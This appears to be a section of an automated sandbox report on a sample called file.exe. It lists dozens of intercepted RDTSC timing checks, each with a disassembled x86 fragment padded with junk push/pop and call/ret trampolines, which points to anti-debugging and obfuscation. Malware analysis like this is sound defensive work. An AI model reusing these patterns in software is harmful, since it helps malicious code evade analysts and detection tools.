                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992DFA second address: 992E02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8BE1 second address: 9D8BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DABDE second address: 9DABFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE39h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DABFC second address: 9DAC06 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F147AEA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D9DA5 second address: 9D9E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D5769h], eax 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F7F1511CE28h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov bx, AFBAh 0x00000033 xor edi, 09865B4Ch 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov ebx, edi 0x00000042 mov eax, dword ptr [ebp+122D10E5h] 0x00000048 mov bl, A0h 0x0000004a push FFFFFFFFh 0x0000004c mov bx, dx 0x0000004f nop 0x00000050 push ecx 0x00000051 pushad 0x00000052 push ecx 0x00000053 pop ecx 0x00000054 jp 00007F7F1511CE26h 0x0000005a popad 0x0000005b pop ecx 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 jnc 00007F7F1511CE26h 0x00000066 jmp 00007F7F1511CE2Ah 0x0000006b popad 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBC5F second address: 9DBC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBC65 second address: 9DBC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBE25 second address: 9DBE2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBE2B second address: 9DBE30 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DDB4C second address: 9DDB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DDB53 second address: 9DDBEA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F1511CE2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7F1511CE39h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F7F1511CE28h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b jmp 00007F7F1511CE38h 0x00000030 push 00000000h 0x00000032 movsx ebx, ax 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007F7F1511CE28h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov dword ptr [ebp+122D2CE9h], eax 0x00000057 xchg eax, esi 0x00000058 jng 00007F7F1511CE30h 0x0000005e push eax 0x0000005f push edx 0x00000060 push esi 0x00000061 pop esi 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DDD72 second address: 9DDD7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F147AEA46h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DFC73 second address: 9DFCAC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F7F1511CE34h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c or di, 8F74h 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D318Ah] 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jno 00007F7F1511CE2Ch 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DED05 second address: 9DED09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DEDBC second address: 9DEDC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E0BBB second address: 9E0BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA4Ch 0x00000009 popad 0x0000000a jmp 00007F7F147AEA55h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jnp 00007F7F147AEA4Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DFE78 second address: 9DFE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DFE7C second address: 9DFE89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DFE89 second address: 9DFE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E1CEC second address: 9E1CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E2C07 second address: 9E2C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E2C0B second address: 9E2C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E2C11 second address: 9E2C61 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7F1511CE33h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, 461FDFE3h 0x00000013 push 00000000h 0x00000015 mov ebx, edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F7F1511CE28h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 push eax 0x00000034 push eax 0x00000035 push esi 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E3E06 second address: 9E3E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA54h 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E3E28 second address: 9E3E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E3E2D second address: 9E3E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7F147AEA46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E4E90 second address: 9E4F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F7F1511CE26h 0x00000009 jmp 00007F7F1511CE39h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 xor dword ptr [ebp+122D311Ch], edi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D1A81h], ecx 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F7F1511CE28h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov edi, dword ptr [ebp+122D2B23h] 0x00000044 and ebx, dword ptr [ebp+122D18FCh] 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push esi 0x0000004e jo 00007F7F1511CE26h 0x00000054 pop esi 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E4F00 second address: 9E4F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7F147AEA46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E4F0A second address: 9E4F23 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jns 00007F7F1511CE26h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E1E59 second address: 9E1F22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7F147AEA57h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F7F147AEA48h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov edi, eax 0x0000002d push dword ptr fs:[00000000h] 0x00000034 movzx ebx, si 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov dword ptr [ebp+122D28F6h], ecx 0x00000044 mov eax, dword ptr [ebp+122D00D9h] 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d call 00007F7F147AEA48h 0x00000052 pop eax 0x00000053 mov dword ptr [esp+04h], eax 0x00000057 add dword ptr [esp+04h], 00000019h 0x0000005f inc eax 0x00000060 push eax 0x00000061 ret 0x00000062 pop eax 0x00000063 ret 0x00000064 mov ebx, dword ptr [ebp+122D2AA3h] 0x0000006a push FFFFFFFFh 0x0000006c jmp 00007F7F147AEA4Fh 0x00000071 nop 0x00000072 pushad 0x00000073 jnl 00007F7F147AEA4Ch 0x00000079 jnl 00007F7F147AEA48h 0x0000007f popad 0x00000080 push eax 0x00000081 push ecx 0x00000082 push eax 0x00000083 push edx 0x00000084 jbe 00007F7F147AEA46h 0x0000008a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E0D94 second address: 9E0D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5C8D second address: 9E5C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5C91 second address: 9E5C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5C95 second address: 9E5CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F7F147AEA48h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D28EFh], ecx 0x0000002c push 00000000h 0x0000002e sub dword ptr [ebp+122D31C7h], ecx 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 push esi 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5CD2 second address: 9E5CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5ED6 second address: 9E5EEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5EEB second address: 9E5EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7F1511CE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E7DC2 second address: 9E7DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E7DC6 second address: 9E7E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F7F1511CE33h 0x0000000c jmp 00007F7F1511CE2Dh 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push edx 0x00000016 mov bx, di 0x00000019 pop ebx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F7F1511CE28h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 jl 00007F7F1511CE2Ch 0x0000003c mov dword ptr [ebp+122D35FCh], ebx 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push eax 0x00000047 call 00007F7F1511CE28h 0x0000004c pop eax 0x0000004d mov dword ptr [esp+04h], eax 0x00000051 add dword ptr [esp+04h], 00000017h 0x00000059 inc eax 0x0000005a push eax 0x0000005b ret 0x0000005c pop eax 0x0000005d ret 0x0000005e mov bh, 25h 0x00000060 mov dword ptr [ebp+122D3124h], edx 0x00000066 xchg eax, esi 0x00000067 pushad 0x00000068 jmp 00007F7F1511CE2Dh 0x0000006d push eax 0x0000006e push edx 0x0000006f ja 00007F7F1511CE26h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E7E5A second address: 9E7E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EA351 second address: 9EA356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E7F8A second address: 9E7F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F7F147AEA48h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E8044 second address: 9E804A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E804A second address: 9E8062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F147AEA54h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EC9E8 second address: 9EC9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F0BF1 second address: 9F0BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F0BF7 second address: 9F0C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F7F1511CE26h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F0C06 second address: 9F0C1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F058A second address: 9F058E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F058E second address: 9F05AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F147AEA54h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F06F4 second address: 9F06F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98722F second address: 987234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F61CE second address: 9F61D8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F61D8 second address: 9F61DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FBD00 second address: 9FBD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FBD06 second address: 9FBD10 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F147AEA46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC7F6 second address: 9FC807 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F1511CE2Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC807 second address: 9FC80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FC80D second address: 9FC813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06D7A second address: A06D95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F7F147AEA46h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F7F147AEA4Bh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06D95 second address: A06D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06D99 second address: A06DC4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA46h 0x00000008 jnc 00007F7F147AEA46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F7F147AEA53h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06DC4 second address: A06DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06DC8 second address: A06DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06DD3 second address: A06DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06DD8 second address: A06DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F147AEA4Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06DE9 second address: A06DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A05ACE second address: A05AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA53h 0x00000007 jng 00007F7F147AEA46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A05C68 second address: A05C87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F7F1511CE2Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F7F1511CE26h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A05C87 second address: A05C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A05C8D second address: A05C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A05C91 second address: A05C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A05C95 second address: A05CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06087 second address: A0608B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0608B second address: A0608F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06202 second address: A0620E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F147AEA46h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A05797 second address: A057E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE31h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jnp 00007F7F1511CE32h 0x00000012 jmp 00007F7F1511CE2Ch 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b js 00007F7F1511CE26h 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F7F1511CE31h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A057E1 second address: A057F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F147AEA4Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A057F3 second address: A057F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D1F2D second address: 9D1F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06620 second address: A06635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06A8B second address: A06AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06AA0 second address: A06AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
